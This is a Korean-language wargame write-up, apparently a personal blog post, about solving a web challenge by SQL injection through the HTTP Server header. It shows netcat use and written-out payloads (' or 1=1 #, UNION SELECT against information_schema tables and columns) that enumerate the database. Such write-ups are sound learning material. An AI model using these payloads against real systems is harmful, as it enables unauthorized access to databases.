URL:

Server: Apache

가정 1)
get_headers() 함수로 읽어와서 Server.Apache 로 읽어올수도 있음
Array (
 [0] => HTTP/1.1 200 OK
[1] => Date: Fri, 24 Oct 2008 09:42:52 GMT
 [2] => Server: Apache
[3] => X-Powered-By: PHP/5.2.5
[4] => SSO: UE9ORw==
[5] => Content-Length: 0
[6] => Content-Type: text/html ) )

그러면 header [2] 에다가 조작할수도 있겠고(그런다고 뭐가 달라지겠냐만은)
서버 주소가 어딘가에 저장되는것 봐서는 sql-injection, 아니면 파일첨부??

헤더 Server가 취약한듯 싶다

Netcat이용하면 편리함 nc -Lvp 80 나중에 명령어 및 사용법 정리해둘 것
그런데 왜 Server: 같은 값은 왜 올라가지 않고 왜 먹힐까 되는 것일까 ? -_-;
옵션을 내가 Server:는 올리지 마라 명령주지도 않았는데
기본적인 GET / HTTP 1.0 / MESSAGE
                 HOST:121.44.22.33

                 Server: ' or 1=1 # ( 엔터 한번 입력하면 다른 입력값도 넣을 수 있는듯 하고)
                                             ( 아무것도 없이 엔터입력하면 reply를 보내는듯함)

<적용 header>
Server: ' or 1=1 #
Server: ' or 1=1 limit 1 #
Server:' or 1=1 union 이런건 에러메시지가 뜨지 않아서 유추하기가 쉽지 않을 것 같음

그이외의 방법이 뭐가 있을까?

가정 1) select no,url,server from (table) where 'Server' = 'Server:입력값'

음 여러방면으로 헤메다가

아무리봐도 방법이 않보여서 쿼리문쪽 다시 건들여보기로 함

Server: 9' union select table_schema,table_name,3 from informatioin_schema.tables #

하면

fsas , fsastab,
fsas , readme

가 나오네요,

Server: 9' union select 1,column_name,3 from information_schema.columns #

하면

no, url, server, value가 나옵니다

위의 두개의 결과값을 가지고 query문 완성하면  you maybe get a key!

웹 7번 문제하고 어찌보면 비슷한문제인듯

Uncoomon SQL Injection 문서 참고했습니다. - 와우해커 [번역] 비범한 SQL 삽입 참조했습니다.

이외로 SQL부분은 간단하게 문제낸듯 싶네요. 물론 레벨 7에서 많이 헤메서 그렇게 느껴지는것인지도 모르겠지만

문제 풀면서, 웹게임은 처음 접해보는건데, 풀어보면서 여러가지 작동원리에 대해서 좀 더 생각을 해본 계기가 되었고
재미도 있었습니다.

뭐 남들은 2틀만에 다 푼다고하는데, 
저같은 경우는 이거하면서 새롭게 알게 되어서 많이 배운듯 싶네요
... 와 웹프락시 툴 이런것도 있구나(인터넷검색)
md5가 뭔고(인터넷검색)
base64는 또 모야..?(인터넷검색) 
netcat툴(아직 사용법도 제대로 모르지만)- anodos 님 정말 감사해요 ^^

sql injection 이야 정말 되네~ ^-^ 하는기쁨
(근데 제가 전에 sql injection 되게 구현할려고 해도 구현하기가 힘들던데 -_-) 나중에 테스트해봐야겠다능 -_-

몇주 몇일을 고민하고, 검색하고, 질문하고, 수 많은 삽질을 통해서
계속 문을 두들기니 그래도 어찌됐던같에 답이 나오긴 나오는군요. ^-^ 

이러한 문제들로 저같은 초보들에게 웹게임의 재미와 보안에 대한 관심을 알려주려는 것 같습니다~

좋은문제 내주신 와우해커님들에게 감사합니다~